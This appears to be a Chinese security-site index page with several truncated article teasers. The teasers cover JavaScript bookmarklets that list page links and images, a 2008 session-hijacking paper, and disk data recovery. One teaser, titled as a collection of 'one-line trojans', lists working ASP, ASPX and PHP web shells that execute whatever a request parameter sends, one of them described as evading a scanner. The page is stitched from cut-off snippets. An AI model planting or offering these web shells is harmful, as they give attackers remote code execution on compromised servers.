几个document集合的利用

获取页面所有链接 javascript:var h="";for ( i = 0; i< document.links.length; i++ ) h+=document.links(i).href+"<br/>";x=window.open("about");x.document.write(h); 获取页面所有框架 javascript:var h="";for ( i = 0; i< document.links.length; i++ ) h+=document.frames(i).name+"<br/>";x=window.open("about");x.document.write(h); 获取页面所有图片地址 javascript:var h="";for ( i = 0; i< document.images.length; i++ ) h+=document.images(i).src+"<br/>"+"<img src=\'"+document.images(i).src+"\'/>"+"<br />";x=window.open("about:blank");x.document.write(h); 获取页面所有脚本地

一句话木马大全

images <!--#include file="images\1.jpg" --> <%eval request("3")%> <%execute request("3")%> <%execute(request("3"))%> <%If Request("3")<>"" Then Execute(Request("3"))%> <%if request ("3")<>""then session("3")=request("3"):end if:if session("3")<>"" then execute session ("3")%> <SCRIPT language=VBScript runat="server">execute request("3")</SCRIPT> <%@ Page Language="Jscript"%> <%eval(Request.Item["3"],"unsafe");%> asp一句话 <%execute(request("3"))%> php一句话 <?php eval($_POST[3]);?> aspx一句话 <script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); </script> 可以躲过雷客图的

硬盘数据恢复常识

硬盘数据恢复常识        数据恢复一直以来都是我们关注的问题,因为你的电脑数据每天都在受着诸如病毒、恶意代码、黑客、误操作等的威胁!那么如何才能恢复

一种真正意义上的Session劫持

一种真正意义上的Session劫持 Author: jianxin [80sec] EMail: jianxin#80sec.com Site: http://www.80sec.com Date: 2008-12-24 From: http://www.80sec.com/release/session-hijacking.txt [ 目录 ] 0×00 应用程序认证设计背景 0×01 常规攻击思路及缺陷 0×02 利用应用程序设